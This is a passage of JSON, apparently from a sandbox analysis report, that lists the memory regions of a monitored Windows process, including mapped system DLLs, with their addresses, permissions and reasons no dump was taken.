"permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_2851", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:05:12.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2852", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:05:12.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1972109312, "type": "region", "version": 1 }, "end_va": 1973157887, "entry_point": 1972109312, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_2853", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1972109312, "timestamp": "00:05:12.910", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1989476352, "type": "region", "version": 1 }, "end_va": 1990066175, "entry_point": 1989476352, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_2854", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1989476352, "timestamp": "00:05:12.910", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989124095, "entry_point": 1989083136, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_2855", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:05:12.911", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1980825600, "type": "region", "version": 1 }, "end_va": 1981468671, "entry_point": 1980825600, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_2856", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1980825600, "timestamp": "00:05:12.911", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 2004090880, "type": "region", "version": 1 }, "end_va": 2004746239, "entry_point": 2004090880, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_2857", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 2004090880, "timestamp": "00:05:12.912", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 122880, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 253951, "entry_point": 131072, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2858", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 131072, "timestamp": "00:05:12.914", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 7372799, "entry_point": 0, "filename": null, "id": "region_2859", "name": "pagefile_0x0000000000580000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5767168, "timestamp": "00:05:12.914", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1980432384, "type": "region", "version": 1 }, "end_va": 1980825599, "entry_point": 1980432384, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2861", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1980432384, "timestamp": "00:05:12.915", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1985413120, "type": "region", "version": 1 }, "end_va": 1986248703, "entry_point": 1985413120, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_2862", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1985413120, "timestamp": "00:05:12.916", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7405568, "type": "region", "version": 1 }, "end_va": 8982527, "entry_point": 0, "filename": null, "id": "region_2863", "name": "pagefile_0x0000000000710000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7405568, "timestamp": "00:05:12.917", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9895936, "type": "region", "version": 1 }, "end_va": 30867455, "entry_point": 0, "filename": null, "id": "region_2864", "name": "pagefile_0x0000000000970000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9895936, "timestamp": "00:05:12.917", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_2865", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:05:12.920", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2866", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:05:12.920", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 593919, "entry_point": 0, "filename": null, "id": "region_2867", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:05:12.920", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_2868", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:05:12.920", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 30867456, "type": "region", "version": 1 }, "end_va": 35008511, "entry_point": 0, "filename": null, "id": "region_2869", "name": "pagefile_0x0000000001d70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30867456, "timestamp": "00:05:12.920", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1982070784, "type": "region", "version": 1 }, "end_va": 1983238143, "entry_point": 1982070784, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_2870", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1982070784, "timestamp": "00:05:12.921", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1983250432, "type": "region", "version": 1 }, "end_va": 1983299583, "entry_point": 1983250432, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_2871", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1983250432, "timestamp": "00:05:12.921", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1990656000, "type": "region", "version": 1 }, "end_va": 2003542015, "entry_point": 1990656000, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_2872", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1990656000, "timestamp": "00:05:12.926", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1983315968, "type": "region", "version": 1 }, "end_va": 1983672319, "entry_point": 1983315968, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_2873", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1983315968, "timestamp": "00:05:12.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1974272000, "type": "region", "version": 1 }, "end_va": 1974292479, "entry_point": 1974272000, "filename": "\\Windows\\SysWOW64\\psapi.dll", "id": "region_2874", "name": "psapi.dll", "norm_filename": "c:\\windows\\syswow64\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1974272000, "timestamp": "00:05:12.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1974337536, "type": "region", "version": 1 }, "end_va": 1975762943, "entry_point": 1974337536, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_2875", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1974337536, "timestamp": "00:05:12.931", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1978793984, "type": "region", "version": 1 }, "end_va": 1979797503, "entry_point": 1978793984, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_2876", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1978793984, "timestamp": "00:05:12.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987862527, "entry_point": 1986592768, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_2877", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:05:12.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1981480960, "type": "region", "version": 1 }, "end_va": 1982066687, "entry_point": 1981480960, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_2878", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1981480960, "timestamp": "00:05:12.934", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1975779328, "type": "region", "version": 1 }, "end_va": 1977855999, "entry_point": 1975779328, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_2879", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1975779328, "timestamp": "00:05:12.934", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1969815552, "type": "region", "version": 1 }, "end_va": 1969848319, "entry_point": 1969815552, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_2880", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1969815552, "timestamp": "00:05:12.937", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2490368, "start_va": 35061760, "type": "region", "version": 1 }, "end_va": 37552127, "entry_point": 0, "filename": null, "id": "region_2881", "name": "private_0x0000000002170000", "norm_filename": null, "region_type": "private_memory", "start_va": 35061760, "timestamp": "00:05:12.938", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1969684480, "type": "region", "version": 1 }, "end_va": 1969774591, "entry_point": 1969684480, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_2882", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1969684480, "timestamp": "00:05:12.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1228799, "entry_point": 983040, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2883", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:05:12.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1969422336, "type": "region", "version": 1 }, "end_va": 1969663999, "entry_point": 1969422336, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2888", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1969422336, "timestamp": "00:05:12.946", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 37552128, "type": "region", "version": 1 }, "end_va": 40497151, "entry_point": 37552128, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2889", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 37552128, "timestamp": "00:05:12.947", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_2908", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3866623, "entry_point": 0, "filename": null, "id": "region_2909", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 5308415, "entry_point": 0, "filename": null, "id": "region_2910", "name": "private_0x00000000004d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5046272, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5373952, "type": "region", "version": 1 }, "end_va": 5636095, "entry_point": 0, "filename": null, "id": "region_2911", "name": "private_0x0000000000520000", "norm_filename": null, "region_type": "private_memory", "start_va": 5373952, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9306112, "type": "region", "version": 1 }, "end_va": 9568255, "entry_point": 0, "filename": null, "id": "region_2912", "name": "private_0x00000000008e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9306112, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 35454976, "type": "region", "version": 1 }, "end_va": 35717119, "entry_point": 0, "filename": null, "id": "region_2913", "name": "private_0x00000000021d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35454976, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 35717120, "type": "region", "version": 1 }, "end_va": 35979263, "entry_point": 0, "filename": null, "id": "region_2914", "name": "private_0x0000000002210000", "norm_filename": null, "region_type": "private_memory", "start_va": 35717120, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36175872, "type": "region", "version": 1 }, "end_va": 36438015, "entry_point": 0, "filename": null, "id": "region_2915", "name": "private_0x0000000002280000", "norm_filename": null, "region_type": "private_memory", "start_va": 36175872, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36438016, "type": "region", "version": 1 }, "end_va": 36700159, "entry_point": 0, "filename": null, "id": "region_2916", "name": "private_0x00000000022c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36438016, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36700160, "type": "region", "version": 1 }, "end_va": 36962303, "entry_point": 0, "filename": null, "id": "region_2917", "name": "private_0x0000000002300000", "norm_filename": null, "region_type": "private_memory", "start_va": 36700160, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 37027840, "type": "region", "version": 1 }, "end_va": 37552127, "entry_point": 0, "filename": null, "id": "region_2918", "name": "private_0x0000000002350000", "norm_filename": null, "region_type": "private_memory", "start_va": 37027840, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 40763392, "type": "region", "version": 1 }, "end_va": 41025535, "entry_point": 0, "filename": null, "id": "region_2919", "name": "private_0x00000000026e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40763392, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41025536, "type": "region", "version": 1 }, "end_va": 41287679, "entry_point": 0, "filename": null, "id": "region_2920", "name": "private_0x0000000002720000", "norm_filename": null, "region_type": "private_memory", "start_va": 41025536, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41484288, "type": "region", "version": 1 }, "end_va": 41746431, "entry_point": 0, "filename": null, "id": "region_2921", "name": "private_0x0000000002790000", "norm_filename": null, "region_type": "private_memory", "start_va": 41484288, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42008576, "type": "region", "version": 1 }, "end_va": 42270719, "entry_point": 0, "filename": null, "id": "region_2922", "name": "private_0x0000000002810000", "norm_filename": null, "region_type": "private_memory", "start_va": 42008576, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42270720, "type": "region", "version": 1 }, "end_va": 42532863, "entry_point": 0, "filename": null, "id": "region_2923", "name": "private_0x0000000002850000", "norm_filename": null, "region_type": "private_memory", "start_va": 42270720, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42729472, "type": "region", "version": 1 }, "end_va": 42991615, "entry_point": 0, "filename": null, "id": "region_2924", "name": "private_0x00000000028c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42729472, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 43319296, "type": "region", "version": 1 }, "end_va": 43581439, "entry_point": 0, "filename": null, "id": "region_2925", "name": "private_0x0000000002950000", "norm_filename": null, "region_type": "private_memory", "start_va": 43319296, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130292736, "type": "region", "version": 1 }, "end_va": 2130305023, "entry_point": 0, "filename": null, "id": "region_2926", "name": "private_0x000000007ef9b000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130292736, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130305024, "type": "region", "version": 1 }, "end_va": 2130317311, "entry_point": 0, "filename": null, "id": "region_2927", "name": "private_0x000000007ef9e000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130305024, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130317312, "type": "region", "version": 1 }, "end_va": 2130329599, "entry_point": 0, "filename": null, "id": "region_2928", "name": "private_0x000000007efa1000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130317312, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130329600, "type": "region", "version": 1 }, "end_va": 2130341887, "entry_point": 0, "filename": null, "id": "region_2929", "name": "private_0x000000007efa4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130329600, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130341888, "type": "region", "version": 1 }, "end_va": 2130354175, "entry_point": 0, "filename": null, "id": "region_2930", "name": "private_0x000000007efa7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130341888, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_2931", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_2932", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_2933", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:05:12.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 991231, "entry_point": 0, "filename": null, "id": "region_2936", "name": "pagefile_0x00000000000f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 983040, "timestamp": "00:05:12.993", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1967718400, "type": "region", "version": 1 }, "end_va": 1969414143, "entry_point": 1967718400, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_2937", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1967718400, "timestamp": "00:05:12.993", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], 